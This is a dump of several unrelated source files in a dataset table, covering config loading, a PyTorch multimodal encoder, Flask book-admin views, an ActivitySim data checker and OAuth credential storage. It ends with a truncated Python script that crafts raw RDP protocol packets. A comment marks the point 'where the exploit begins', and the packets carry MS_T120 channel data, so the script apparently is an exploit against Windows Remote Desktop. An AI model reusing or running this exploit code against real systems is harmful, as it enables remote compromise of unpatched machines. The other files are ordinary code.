id
stringlengths 3
8
| content
stringlengths 100
981k
|
---|---|
501608 | import os
import warnings
import sys
if sys.version_info[0] == 2:
from ConfigParser import SafeConfigParser
else:
from configparser import SafeConfigParser
__masked__ = False
def set_masked_default(choice):
'Set whether tables should be masked or not by default (True or False)'
global __masked__
__masked__ = choice
filename = os.path.expanduser('~/.atpyrc')
config = SafeConfigParser()
config.read(filename)
if config.has_option('general', 'masked_default'):
if config.getboolean('general', 'masked_default'):
warnings.warn(".atpyrc file found - masked arrays are ON by default")
set_masked_default(True)
else:
warnings.warn(".atpyrc file found - masked arrays are OFF by default")
set_masked_default(False)
|
501611 | import torch
from torch import nn
import torch.nn.functional as F
from torch.nn.utils.rnn import pad_sequence, pack_padded_sequence, pad_packed_sequence
from transformers import BertModel, BertConfig
from utils import CMD, MSE
class LanguageEmbeddingLayer(nn.Module):
"""Embed input text with "glove" or "Bert"
"""
def __init__(self, hyp_params):
super(LanguageEmbeddingLayer, self).__init__()
self.hp = hp = hyp_params
if hp.use_bert:
bertconfig = BertConfig.from_pretrained('bert-base-uncased', output_hidden_states=True)
self.bertmodel = BertModel.from_pretrained('bert-base-uncased', config=bertconfig)
else:
self.embed = nn.Embedding(len(hp.word2id), hp.orig_d_l)
def forward(self, sentences, lengths, bert_sent, bert_sent_type, bert_sent_mask):
if self.hp.use_bert:
bert_output = self.bertmodel(input_ids=bert_sent,
attention_mask=bert_sent_mask,
token_type_ids=bert_sent_type)
bert_output = bert_output[0]
# masked mean
# masked_output = torch.mul(bert_sent_mask.unsqueeze(2), bert_output)
# mask_len = torch.sum(bert_sent_mask, dim=1, keepdim=True)
# output = torch.sum(masked_output, dim=1, keepdim=False) / mask_len
return bert_output
else:
# extract features from text modality
output = self.embed(sentences)
return output
class SeqEncoder(nn.Module):
"""Encode all modalities with assigned network. The network will output encoded presentations
of three modalities. The last hidden of LSTM/GRU generates as input to the control module,
while separate sequence vectors are received by the transformer.
TODO: Currently only use one component to encode (coded in "if...else..."). Try to preserve the
interface of both CNN and LSTM/GRU part. In case one approach can not generate satisfying separate vectors.
Then activate both components to generate all outputs.
"""
def __init__(self, hyp_params):
super(SeqEncoder, self).__init__()
self.hp = hp = hyp_params
self.orig_d_l, self.orig_d_a, self.orig_d_v = hp.orig_d_l, hp.orig_d_a, hp.orig_d_v
self.d_l = self.d_a = self.d_v = hp.attn_dim
self.proj_type = hp.proj_type.lower()
def pad_size(ksize, in_size, out_size, stride=1, mode='same'):
if mode.lower() == 'valid': return 0
return (out_size - in_size + ksize - 1) // stride + 1
############################
# TODO: use compound mode ##
############################
if hp.proj_type == 'linear':
self.proj_l = nn.Linear(self.orig_d_l, self.d_l)
self.proj_v = nn.Linear(self.orig_d_v, self.d_v)
self.proj_a = nn.Linear(self.orig_d_a, self.d_a)
self.layer_norm_l = nn.LayerNorm(self.d_l)
self.layer_norm_v = nn.LayerNorm(self.d_v)
self.layer_norm_a = nn.LayerNorm(self.d_a)
elif hp.proj_type == 'cnn':
l_ksize = self.hp.l_ksize
v_ksize = self.hp.v_ksize
a_ksize = self.hp.a_ksize
pad_l = int((l_ksize - 1) / 2)
pad_v = int((v_ksize - 1) / 2)
pad_a = int((a_ksize - 1) / 2)
self.proj_l = nn.Conv1d(self.orig_d_l, self.d_l, kernel_size=l_ksize, padding=pad_l, bias=False)
self.proj_a = nn.Conv1d(self.orig_d_a, self.d_a, kernel_size=a_ksize, padding=pad_a, bias=False)
self.proj_v = nn.Conv1d(self.orig_d_v, self.d_v, kernel_size=v_ksize, padding=pad_v, bias=False)
elif hp.proj_type in ['lstm', 'gru']:
layers = self.hp.num_enc_layers
rnn = nn.LSTM if self.hp.proj_type.lower() == 'lstm' else nn.GRU
#####################################################################
# TODO: 1) Use double layer #
# 2) Keep language unchanged while encode video and accoustic #
#####################################################################L
self.rnn_l = rnn(self.orig_d_l, self.orig_d_l, layers, bidirectional=True)
self.rnn_v = rnn(self.orig_d_v, self.orig_d_v, layers, bidirectional=True)
self.rnn_a = rnn(self.orig_d_a, self.orig_d_a, layers, bidirectional=True)
self.rnn_dict = {'l':self.rnn_l, 'v':self.rnn_v, 'a':self.rnn_a}
# dict that maps modals to corresponding networks
self.linear_proj_l_h = nn.Linear(2*self.orig_d_l, self.d_l)
self.linear_proj_v_h = nn.Linear(2*self.orig_d_v, self.d_v)
self.linear_proj_a_h = nn.Linear(2*self.orig_d_a, self.d_a)
self.linear_proj_l_seq = nn.Linear(2*self.orig_d_l, self.d_l)
self.linear_proj_v_seq = nn.Linear(2*self.orig_d_v, self.d_v)
self.linear_proj_a_seq = nn.Linear(2*self.orig_d_a, self.d_a)
self.layer_norm_l = nn.LayerNorm(self.d_l)
self.layer_norm_v = nn.LayerNorm(self.d_v)
self.layer_norm_a = nn.LayerNorm(self.d_a)
##################################
## TODO: add activations later ##
##################################
self.activ = None
self.proj_l_h = nn.Sequential(self.linear_proj_l_h, self.layer_norm_l)
self.proj_v_h = nn.Sequential(self.linear_proj_v_h, self.layer_norm_v)
self.proj_a_h = nn.Sequential(self.linear_proj_a_h, self.layer_norm_a)
self.proj_l_seq = nn.Sequential(self.linear_proj_l_seq)
self.proj_v_seq = nn.Sequential(self.linear_proj_v_seq)
self.proj_a_seq = nn.Sequential(self.linear_proj_a_seq)
self.proj_dict_h = {'l':self.proj_l_h, 'v':self.proj_v_h, 'a':self.proj_a_h}
self.proj_dict_seq = {'l':self.proj_l_seq, 'v':self.proj_v_seq, 'a':self.proj_a_seq}
else:
raise ValueError("Encoder can only be cnn, lstm or rnn.")
def forward_rnn_prj(self, input, lengths, modal):
assert modal in "lva"
lengths = lengths.to('cpu').to(torch.int64)
packed_sequence = pack_padded_sequence(input, lengths)
packed_h, h_out = self.rnn_dict[modal](packed_sequence)
padded_h, _ = pad_packed_sequence(packed_h) # (seq_len, batch_size, emb_size)
if self.proj_type == 'lstm':
h_out = h_out[0] # for lstm we don't need the cell state
h_out = torch.cat((h_out[0], h_out[1]), dim=-1)
h_out = self.proj_dict_h[modal](h_out)
h_out_seq = self.proj_dict_seq[modal](padded_h)
return h_out_seq, h_out
def _masked_avg_pool(self, lengths, mask, *inputs):
"""Perform a masked average pooling operation
Args:
lengths (Tensor): shape of (batch_size, max_seq_len)
inputs (Tuple[Tensor]): shape of (batch_size, max_seq_len, embedding)
"""
res = []
for t in inputs:
masked_mul = t * mask # batch_size, seq_len, emb_size
res.append(masked_mul.sum(1)/lengths.unsqueeze(-1))
return res
def forward_enc(self, input_l, input_a, input_v, lengths=None, mask=None):
batch_size = lengths.size(0)
if lengths is not None:
mask = torch.arange(lengths.max()).repeat(batch_size, 1).cuda() < lengths.unsqueeze(-1)
mask = mask.unsqueeze(-1).to(torch.float)
elif mask: # use_bert
lengths = mask.sum(1)
if self.hp.use_bert:
input_l = input_l.permute(1, 0, 2)
if self.hp.proj_type == 'linear':
perm = (1, 0, 2)
l_seq = self.proj_l(input_l.permute(*perm)) # (bs, seq_len, attn_size)
v_seq = self.proj_v(input_v.permute(*perm))
a_seq = self.proj_a(input_a.permute(*perm))
l_h, v_h, a_h = self._masked_avg_pool(lengths, mask, l_seq, v_seq, a_seq)
l_seq, v_seq, a_seq = l_seq.permute(*perm), v_seq.permute(*perm), a_seq.permute(*perm)
elif self.proj_type == 'cnn':
perm1 = (1,2,0)
perm2 = (0,2,1)
perm3 = (1,0,2)
# text input: (seq_len x bs x emb_size) -> (bs, emb_size, seq_len)
# output -> (seq_len x bs x emb_size, bs x emb_size)
l_seq = self.proj_l(input_l.permute(*perm1)).permute(*perm2) # bs x seq_len x emb emb_size
v_seq = self.proj_v(input_v.permute(*perm1)).permute(*perm2)
a_seq = self.proj_a(input_a.permute(*perm1)).permute(*perm2)
# maxpooling to generate output
l_h, v_h, a_h = self._masked_avg_pool(lengths, mask, l_seq, v_seq, a_seq)
l_seq, v_seq, a_seq = l_seq.permute(*perm3), v_seq.permute(*perm3), a_seq.permute(*perm3)
# enocde with lstm or gru
elif self.proj_type in ['lstm', 'gru']:
l_seq, l_h = self.forward_rnn_prj(input_l, lengths, modal = 'l')
v_seq, v_h = self.forward_rnn_prj(input_v, lengths, modal = 'v')
a_seq, a_h = self.forward_rnn_prj(input_a, lengths, modal = 'a')
return {'l': (l_seq, l_h), 'v':(v_seq, v_h), 'a':(a_seq, a_h)}
##################################
# TODO: Correct input shapes here
#################################
def forward(self, input_l, input_v, input_a, lengths):
"""Encode Sequential data from all modalities
Params:
@input_l, input_a, input_v (Tuple(Tensor, Tensor)):
Tuple containing input and lengths of input. The vectors are in the size
(seq_len, batch_size, embed_size)
Returns:
@hidden_dic (dict): A dictionary contains hidden representations of all
modalities and for each modality the value includes the hidden vector of
the whole sequence and the final hidden (a.k.a sequence hidden).
All hidden representations are projected to the same size for transformer
and its controller use.
"""
return self.forward_enc(input_l, input_v, input_a, lengths)
class DIVEncoder(nn.Module):
"""Construct a domain-invariant encoder for all modalities. Forward and return domain-invariant
encodings for these modality with similarity and reconstruction (optional) loss.
Args:
in_size (int): hidden size of input vector(s), of which is a representation for each modality
out_size (int): hidden_size
"""
def __init__(self, in_size, out_size, prj_type='linear', use_disc=False,
rnn_type=None, rdc_type=None, p_l=0.0, p_o=0.0):
super(DIVEncoder, self).__init__()
self.prj_type = prj_type
self.reduce = rdc_type
self.use_disc = use_disc
self.in_size = in_size
self.out_size = out_size
if prj_type == 'linear':
self.encode_l = nn.Linear(in_size, out_size)
self.encode_o = nn.Linear(in_size, out_size)
elif prj_type == 'rnn':
self.rnn_type = rnn_type.upper()
rnn = getattr(nn, self.rnn_type)
self.encode_l = rnn(input_size=in_size,
hidden_size=out_size,
num_layers=1,
dropout=p_l,
bidirectional=True)
self.encode_o = rnn(input_size=in_size,
hidden_size=out_size,
num_layers=1,
dropout=p_o,
bidirectional=True)
if use_disc:
self.discriminator = nn.Sequential(
nn.Linear(out_size, 4*out_size),
nn.ReLU(),
nn.Linear(4*out_size, 1),
nn.Sigmoid()
)
self.dropout_l = nn.Dropout(p_l)
self.dropout_o = nn.Dropout(p_o)
def _masked_avg_pool(self, lengths, mask, *inputs):
"""Perform a masked average pooling operation
Args:
lengths (Tensor): A tensor represents the lengths of input sequence with size (batch_size,)
mask (Tensor):
inputs (Tuple[Tensor]): Hidden representations of input sequence with shape of (max_seq_len, batch_size, embedding)
"""
res = []
# bert mask only has 2 dimensions
if len(mask.size()) == 2:
mask = mask.unsqueeze(-1)
for t in inputs:
masked_mul = t.permute(1,0,2) * mask # batch_size, seq_len, emb_size
res.append(masked_mul.sum(1)/lengths.unsqueeze(-1)) # batch_size, emb_size
return res
def _forward_rnn(self, rnn, input, lengths):
packed_sequence = pack_padded_sequence(input, lengths.cpu())
packed_h, h_out = rnn(packed_sequence)
padded_h, _ = pad_packed_sequence(packed_h)
return padded_h, h_out
def forward(self, input_l, input_o, lengths, mask):
if self.prj_type == 'linear':
if self.reduce == 'avg':
avg_l, avg_o = self._masked_avg_pool(lengths, mask, input_l, input_o)
elif self.reduce is None:
avg_l, avg_o = input_l, input_o
else:
raise ValueError("Reduce method can be either average or none if projection type is linear")
enc_l = self.encode_l(avg_l)
enc_o = self.encode_o(avg_o)
elif self.prj_type == 'rnn':
out_l, h_l = self._forward_rnn(self.encode_l, input_l, lengths)
out_o, h_o = self._forward_rnn(self.encode_o, input_o, lengths)
if self.reduce == 'last':
h_l_last = h_l[0] if isinstance(h_l, tuple) else h_l
h_o_last = h_o[0] if isinstance(h_o, tuple) else h_o
enc_l = (h_l_last[0] + h_l_last[1]) / 2
enc_o = (h_o_last[0] + h_o_last[1]) / 2
elif self.reduce == 'avg':
enc_l, enc_o = self._masked_avg_pool(lengths, mask, out_l, out_o)
enc_l = (enc_l[:,:enc_l.size(1) // 2] + enc_l[:,enc_l.size(1) // 2:]) / 2
enc_o = (enc_o[:,:enc_o.size(1) // 2] + enc_o[:,enc_o.size(1) // 2:]) / 2
else:
raise ValueError("Reduce method can be either last or average if projection type is linear")
enc_l, enc_o = self.dropout_l(enc_l), self.dropout_o(enc_o)
if self.use_disc:
# generate discriminator output together with its labels
disc_out = self.discriminator(torch.cat((enc_l, enc_o), dim=0)).squeeze() # (2 * batch_size, 1)
batch_size = enc_l.size(0)
disc_labels = torch.cat([torch.Tensor([0]).expand(size=(batch_size,)), \
torch.Tensor([1]).expand(size=(batch_size,))], dim=0).squeeze()
return enc_l, enc_o, disc_out, disc_labels |
501615 | from easy_select2.utils import apply_select2, select2_modelform, select2_modelform_meta
from easy_select2.widgets import Select2, Select2Mixin, Select2Multiple
__all__ = ['Select2', 'Select2Mixin', 'Select2Multiple', 'apply_select2',
'select2_modelform', 'select2_modelform_meta']
|
501631 | import itertools as it
def longest_consecutive_seq_len(a):
s = set(a)
best_len = 0
for x in a:
if x not in s: continue
current_len = 1
for step in (1, -1):
for i in it.count(x+step, step):
if i in s: current_len += 1
else: s -= set(range(x, i, step)); break
best_len = max(best_len, current_len)
return best_len
|
501656 | import os
import pandas as pd
import openmatrix as omx
import numpy as np
import argparse
parser = argparse.ArgumentParser(description='check activitysim raw_data')
parser.add_argument('raw_data_directory', metavar='raw_data_directory', type=str, nargs=1,
help=f"path to raw data directory")
parser.add_argument('-o', '--output',
type=str,
metavar='PATH',
help='path to output dir')
args = parser.parse_args()
input_dir = args.raw_data_directory[0]
output_dir = args.output
print(f"input_dir {input_dir}")
print(f"output_dir {output_dir}")
def input_path(file_name):
return os.path.join(input_dir, file_name)
def output_path(file_name):
return os.path.join(output_dir, file_name)
def integerize_id_columns(df, table_name):
columns = ['MAZ', 'OMAZ', 'DMAZ', 'TAZ', 'zone_id', 'household_id', 'HHID']
for c in df.columns:
if c in columns:
bad = ~(df[c] == df[c].astype(int))
if bad.any():
print(f"\n### OOPS ### table {table_name} bad integer column {c}\n")
df[c] = df[c].astype(int)
def read_csv(file_name, integerize=True):
df = pd.read_csv(input_path(file_name))
print(f"read {file_name} {df.shape}")
return df
def to_csv(df, file_name):
print(f"writing {file_name} {df.shape} {output_path(file_name)}")
df.to_csv(output_path(file_name), index=False)
def report_baddies(df, tag, fatal=False):
if len(df) > 0:
print(f"\n### OOPS ### {len(df)} {tag}\n")
# print(f"\n{df}\n")
if output_dir:
file_name = f"{tag}.csv"
print(f"writing {tag} {df.shape} to {output_path(file_name)}")
df.to_csv(output_path(file_name), index=False)
if fatal:
raise RuntimeError(tag)
else:
print(f"{len(df)} {tag}")
print(f"input_dir {input_dir} output_dir {output_dir}")
if output_dir and not os.path.isdir(output_dir):
print(f"creating output directory {output_dir}")
os.mkdir(output_dir)
land_use = read_csv("land_use.csv")
# ### check maz.csv against land_use
land_use = land_use.sort_values('MAZ')
maz = read_csv("maz.csv").sort_values('MAZ')
# fatal
missing = land_use.MAZ[~land_use.MAZ.isin(maz.MAZ)]
report_baddies(missing, 'land_use_MAZ_not_in_maz_MAZ', fatal=True)
missing = maz.MAZ[~maz.MAZ.isin(land_use.MAZ)]
report_baddies(missing, 'maz_MAZ_not_in_land_use_MAZ')
# fatal
missing = land_use.TAZ[~land_use.TAZ.isin(maz.TAZ)]
report_baddies(missing, 'land_use_TAZ_not_in_maz_TAZ', fatal=True)
missing = maz.TAZ[~maz.TAZ.isin(land_use.TAZ)]
report_baddies(missing, 'maz_TAZ_not_in_land_use_TAZ')
# ### check taz.csv against land_use
land_use = land_use.sort_values('TAZ')
taz = read_csv("taz.csv").sort_values('TAZ')
if output_dir:
taz.to_csv(output_path('taz.csv'), index=False)
# fatal
missing = land_use.TAZ[~land_use.TAZ.isin(taz.TAZ)]
report_baddies(missing, 'land_use_TAZ_not_in_taz_TAZ', fatal=True)
missing = taz.TAZ[~taz.TAZ.isin(land_use.TAZ)]
report_baddies(missing, 'taz_TAZ_not_in_land_use_TAZ')
# #########s
#
# maz
#
maz = read_csv("maz.csv").sort_values(['MAZ', 'TAZ'])
maz = maz[maz["MAZ"].isin(land_use.MAZ)]
integerize_id_columns(maz, 'maz')
assert (land_use.MAZ.isin(maz.MAZ).all())
assert (land_use.TAZ.isin(maz.TAZ).all())
assert (maz.TAZ.isin(land_use.TAZ).all())
#
# taz
#
taz = read_csv("taz.csv").sort_values(['TAZ'])
taz = taz[taz["TAZ"].isin(land_use.TAZ)]
integerize_id_columns(taz, 'taz')
assert (land_use.TAZ.isin(taz.TAZ).all())
# print(maz.shape)
# print(f"MAZ {len(maz.MAZ.unique())}")
# print(f"TAZ {len(maz.TAZ.unique())}")
#
# households
#
households = read_csv("households.csv")
missing = households[~households["MAZ"].isin(maz.MAZ)]
report_baddies(missing, 'household_MAZ_not_in_maz_MAZ')
integerize_id_columns(households, 'households')
#
# persons
#
persons = read_csv("persons.csv")
orphans = persons[~persons["household_id"].isin(households.HHID)]
report_baddies(orphans, 'persons_not_in_households')
households = households[households["MAZ"].isin(maz.MAZ)]
orphans = persons[~persons["household_id"].isin(households.HHID)]
report_baddies(orphans, 'persons_not_in_households_in_maz_MAZ')
integerize_id_columns(persons, 'persons')
#
# maz_to_maz_walk and maz_to_maz_bike
#
m2m = read_csv("maz_to_maz_walk.csv")
missing = m2m[~(m2m.OMAZ.isin(maz.MAZ) & m2m.DMAZ.isin(maz.MAZ))]
report_baddies(missing, 'maz_to_maz_walk_OMAZ_or_DMAZ_not_in_maz_MAZ')
integerize_id_columns(m2m, "maz_to_maz_walk")
m2m = read_csv("maz_to_maz_bike.csv")
missing = m2m[~(m2m.OMAZ.isin(maz.MAZ) & m2m.DMAZ.isin(maz.MAZ))]
report_baddies(missing, 'maz_to_maz_bike_OMAZ_or_DMAZ_not_in_maz_MAZ')
integerize_id_columns(m2m, "maz_to_maz_bike")
#
# skims
#
omx_infile_name = 'skims.omx'
skim_data_type = np.float32
omx_in = omx.open_file(input_path(omx_infile_name), 'r')
print(f"omx_in shape {omx_in.shape()}")
print(f"{len(omx_in.listMappings())} mappings in skims")
for m in omx_in.listMappings():
print(f"found mapping '{m}' in skims")
assert len(omx_in.listMappings()) == 0
# assert omx_in.shape() == (len(taz), len(taz))
omx_in.close()
|
501694 | import paginate
import requests
from bs4 import BeautifulSoup
from flask import request, url_for, render_template, jsonify, flash
from flask.views import MethodView
from flask_login import login_required
from paginate_sqlalchemy import SqlalchemyOrmWrapper
from sqlalchemy import desc
from nanumlectures.common import is_admin_role, paginate_link_tag
from nanumlectures.database import db_session
from nanumlectures.models import Books, Roundtable
from nanumlectures.settings import SOCIAL_AUTH_NAVER_KEY, SOCIAL_AUTH_NAVER_SECRET
class BooksListView(MethodView):
decorators = [is_admin_role, login_required]
def get(self):
current_page = request.args.get("page", 1, type=int)
search_option = request.args.get("search_option", '')
search_word = request.args.get("search_word", '')
if search_option and search_option in ['books_title']:
search_column = getattr(Books, search_option)
if search_option == "roundtable_num" and search_word and not search_word.isdecimal():
flash('개최회차는 숫자만 입력하셔야 합니다.')
search_word = None
page_url = url_for("admin.books")
if search_word:
page_url = url_for("admin.books", search_option=search_option, search_word=search_word)
page_url = str(page_url) + "&page=$page"
else:
page_url = str(page_url) + "?page=$page"
items_per_page = 10
records = db_session.query(Books).join(Roundtable)
if search_word:
if search_option == 'roundtable_num':
records = records.filter(Roundtable.roundtable_num == search_word)
else:
records = records.filter(search_column.ilike('%{}%'.format(search_word)))
records = records.order_by(desc(Books.id))
total_cnt = records.count()
paginator = paginate.Page(records, current_page, page_url=page_url,
items_per_page=items_per_page,
wrapper_class=SqlalchemyOrmWrapper)
return render_template("admin/books.html", paginator=paginator,
paginate_link_tag=paginate_link_tag,
page_url=page_url, items_per_page=items_per_page,
total_cnt=total_cnt, page=current_page)
class BooksRegView(MethodView):
decorators = [is_admin_role, login_required]
def get(self):
# 회차 정보만 모아오기(유효성 검증용)
roundtable = map(lambda x: x[0], db_session.query(Roundtable.roundtable_num))
return render_template("admin/books_reg.html", roundtable=roundtable)
def post(self):
req_json = request.get_json()
# 도서 관리 추가
books_obj = Books()
books_obj.roundtable = db_session.query(Roundtable).filter(
Roundtable.roundtable_num == req_json.get('roundtable_num')).first()
books_obj.books_title = req_json.get('booksTitle')
books_obj.books_link = req_json.get('booksLink')
books_obj.books_isbn = req_json.get('booksISBN')
books_obj.books_date = req_json.get('booksDate')
books_obj.books_company = req_json.get('booksCompany')
books_obj.books_body = req_json.get('booksBody')
books_obj.books_bookshop = req_json.get('shopLink')
db_session.add(books_obj)
return jsonify(success=True)
class BooksEditView(MethodView):
decorators = [is_admin_role, login_required]
def get(self, book):
# 회차 정보만 모아오기(유효성 검증용)
roundtable = map(lambda x: x[0], db_session.query(Roundtable.roundtable_num))
return render_template("admin/books_edit.html", book=book, roundtable=roundtable)
def post(self, book):
req_json = request.get_json()
# 도서 관리
book.roundtable = db_session.query(Roundtable).filter(
Roundtable.roundtable_num == req_json.get('roundtable_num')).first()
book.books_title = req_json.get('booksTitle')
book.books_link = req_json.get('booksLink')
book.books_isbn = req_json.get('booksISBN')
book.books_date = req_json.get('booksDate')
book.books_company = req_json.get('booksCompany')
book.books_body = req_json.get('booksBody')
book.books_bookshop = req_json.get('shopLink')
return jsonify(success=True)
class BooksDetailView(MethodView):
decorators = [is_admin_role, login_required]
def get(self, book):
return render_template("admin/books_view.html", book=book)
def delete(self, book):
db_session.delete(book)
return jsonify(success=True)
def date_simple_format(text):
return "{}-{}-{}".format(text[0:4], text[4:6], text[6:])
class BookFindNaverAPI(MethodView):
decorators = [is_admin_role, login_required]
def get(self):
headers = {
'X-Naver-Client-Id': SOCIAL_AUTH_NAVER_KEY,
'X-Naver-Client-Secret': SOCIAL_AUTH_NAVER_SECRET
}
r = requests.get('https://openapi.naver.com/v1/search/book_adv.xml?d_isbn=' + request.args.get('isbn'),
headers=headers)
book_info = BeautifulSoup(r.content.decode("utf-8"), "lxml")
link_aladin_req = requests.get(
"https://openapi.naver.com/v1/search/webkr.json?query={}".format("알라딘 " + request.args.get('isbn')),
headers=headers)
link_yes24_req = requests.get(
"https://openapi.naver.com/v1/search/webkr.json?query={}".format("예스24 " + request.args.get('isbn')),
headers=headers)
link_ypbooks_req = requests.get(
"https://openapi.naver.com/v1/search/webkr.json?query={}".format("영풍문고 " + request.args.get('isbn')),
headers=headers)
aladin_link = tuple(filter(lambda x: 'www.aladin.co.kr' in x["link"], link_aladin_req.json()["items"]))
yes24_link = tuple(filter(lambda x: 'www.yes24.com' in x["link"], link_yes24_req.json()["items"]))
ypbook_link = tuple(filter(lambda x: 'www.ypbooks.co.kr' in x["link"], link_ypbooks_req.json()["items"]))
return jsonify(title=book_info.find("item").title.text,
image=book_info.find("item").image.text,
author=book_info.find("item").author.text,
pubdate=date_simple_format(book_info.find("item").pubdate.text),
description=book_info.find("item").description.text,
publisher=book_info.find("item").publisher.text,
store_link=dict(
aladin=aladin_link and aladin_link[0]["link"],
yes24=yes24_link and yes24_link[0]["link"],
ypbook=ypbook_link and ypbook_link[0]["link"])
)
|
501711 | import threading
from oauth2client.client import Storage as BaseStorage
from oauth2client.client import Credentials
from oauth2client.anyjson import simplejson
def from_dict(container):
"""
Create a Credentials object from a dictionary.
The dictionary is first converted to JSON by the native implementation
to ensure it is converted correctly and make updates to the oauth2client module
easier.
"""
jsonRepr = simplejson.dumps(container)
return Credentials.new_from_json(jsonRepr)
def to_dict(credentials):
"""
Convert a Credentials object to a dictionary.
The Credentials object is first converted to JSON by the native implementation
to ensure it is converted correctly and make updates to the oauth2client module
easier.
"""
jsonRepr = credentials.to_json()
dictRepr = simplejson.loads(jsonRepr)
return dictRepr
class DictStorage(BaseStorage):
"""
Storage implementation for storing credentials inside an existing dictionary object.
"""
def __init__(self, container, key='credentials'):
if not isinstance(container, dict):
raise Exception('Container must be an instance of a dict')
self._container = container
self._key = key
self._lock = threading.Lock()
def locked_get(self):
"""Retrieve Credential from Config.
Returns:
oauth2client.client.Credentials
"""
credentials = None
try:
credentials = from_dict(self._container[self._key])
except KeyError:
pass
return credentials
def locked_put(self, credentials):
"""Write Credentials to the Config.
Args:
credentials: Credentials, the credentials to store.
"""
d = to_dict(credentials)
self._container[self._key] = d
def locked_delete(self):
"""Delete Credentials from Config.
"""
del self._container[self._key] |
501738 | import binascii
import string
import random
import struct
import time
from OpenSSL import *
from Crypto.PublicKey.RSA import construct
import rdp_crypto
def connect_req(name):
packet = binascii.unhexlify('0300002e29e00000000000436f6f6b69653a206d737473686173683d')
packet += name #1
packet += binascii.unhexlify('0d0a0100080000000000')
return packet
# initial mcs connect pdu this is where the exploit begins
def mcs_connect_init_pdu():
packet = (
'030001be02f0807f658201b20401010401010101ff30200202002202020002020200000202000102020000020200010202ffff020200023020020200010202000102020001020200010202000002020001020204200202000230200202ffff0202fc170202ffff0202000102020000020200010202ffff020200020482013f000500147c00018136000800100001c00044756361812801c0d800040008002003580201ca03aa09040000280a00006b0061006c00690000000000000000000000000000000000000000000000000004000000000000000c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001ca0100000000001800070001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004c00c00090000000000000002c00c00030000000000000003c03800040000007264706472000000000000c0726470736e640000000000c04d535f5431323000808000004d535f543132300080800000'
)
return binascii.unhexlify(packet)
def erect_domain_req():
packet = ( '0300000c02f0800400010001' )
return binascii.unhexlify(packet)
def attach_user_req():
packet = ( '0300000802f08028' )
return binascii.unhexlify(packet)
# channel join request packets
def get_chan_join_req():
packet = ( '0300000c02f08038000703' )#was 0503
start = 'eb'
channels = []
for c in range(0, 6): #4
channelid = int(start, 16) + c
channel = packet + format(channelid, 'x')
channels.append(channel)
return channels
# parce mcs connection resp (in wireshark as ServerData) packet.
# returns an rsa pubkey object and the server random data used later to
# generate session encryption keys
def parse_mcs_conn_resp(packet):
# 4.1.4 Server MCS Connect Response PDU with GCC Conference Create Response
# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/d23f7725-876c-48d4-9e41-8288896a19d3
# 2.2.1.4.3.1.1.1 RSA Public Key (RSA_PUBLIC_KEY)
# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/fe93545c-772a-4ade-9d02-ad1e0d81b6af
# all the next slicing makes sense when looking at above two links
# find headerType serverSecurityData (0x0c02)
header_offset = packet.find(b'\x02\x0c')
sec_data = packet[header_offset:]
ran_len = int.from_bytes(sec_data[12:12+4], byteorder='little')
server_ran = sec_data[20:20+ran_len]
# magic number
server_cert_offset = packet.find(b'\x52\x53\x41\x31')
server_cert = packet[server_cert_offset:]
key_len = int.from_bytes(server_cert[4:8], byteorder='little')
bit_len = int.from_bytes(server_cert[8:12], byteorder='little')
rsa_pub_exp = int.from_bytes(server_cert[16:20], byteorder='little')
rsa_pub_mod = int.from_bytes(server_cert[20:20+key_len], byteorder='little')
#print('pub_mod = %s' % binascii.hexlify(server_cert[20:20+key_len]))
#print('keylen: %d' % key_len)
#print('bitlen: %d' % bit_len)
#print('pub exp: %d' % rsa_pub_exp)
pubkey = construct((rsa_pub_mod, rsa_pub_exp))
crypt = []
crypt.append(server_ran)
crypt.append(pubkey)
crypt.append(bit_len)
return crypt
# the securty exchange (send our client random encrypted with servers pub RSA key)
def sec_exchange(pubkey, bit_len):
# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/ca73831d-3661-4700-9357-8f247640c02e
# 5.3.4.1 Encrypting Client Random
# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/761e2583-6406-4a71-bfec-cca52294c099
tpkt = binascii.unhexlify('0300') # still require two bytes for size
mcs_pdu = binascii.unhexlify('02f08064000503eb70')
enc_client_ran = pubkey.encrypt(b'A'*32, None)[0]
# reverse for little endian
enc_client_ran = enc_client_ran[::-1]
enc_client_ran = enc_client_ran.ljust(int((bit_len/8)+8), b'\x00')
sec_exchange_len = struct.pack('<I', len(enc_client_ran))
sec_flags = binascii.unhexlify('01000000') #48000000')
sec_exchange_pdu = sec_flags + sec_exchange_len + enc_client_ran
mcs_pdu_size = struct.pack('>H', len(sec_exchange_pdu)+0x8000)
mcs_pdu += mcs_pdu_size
to_send = mcs_pdu + sec_exchange_pdu
#add 4 for tpkt hdr/size
total_size = len(to_send) + 4
tpkt += struct.pack('>H', total_size) + to_send
return tpkt
# client info
def client_info(crypter, name):
packet_hdr = binascii.unhexlify('0300015902f08064000503eb70814a48000000')
packet = binascii.unhexlify('00000000330100000000100000000000000000')
# 2 byte unicode for the name
name = b''.join([b'0'+bytes([b]) for b in name])
packet += name
packet += binascii.unhexlify('00000000000000000002001a003100390032002e003100360038002e0030002e003300340000003c0043003a005c00570049004e004e0054005c00530079007300740065006d00330032005c006d007300740073006300610078002e0064006c006c0000002c0100004700540042002c0020006e006f0072006d0061006c0074006900640000000000000000000000000000000000000000000000000000000000000000000000000000000a00000005000300000000000000000000004700540042002c00200073006f006d006d006100720074006900640000000000000000000000000000000000000000000000000000000000000000000000000000000300000005000200000000000000c4ffffff00000000270000000000')
packet_sig = crypter.sign(packet)
packet_enc = crypter.encrypt(packet)
return packet_hdr + packet_sig + packet_enc
# send client confirm active pdu
def client_confirm(crypter):
packet_hdr = binascii.unhexlify('030001bf02f08064000503eb7081b0')
sec_hdr = binascii.unhexlify('08000000')
